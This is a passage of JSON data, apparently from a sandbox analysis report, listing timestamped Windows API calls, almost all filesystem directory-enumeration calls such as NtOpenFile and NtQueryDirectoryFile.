"timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:37,536", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": 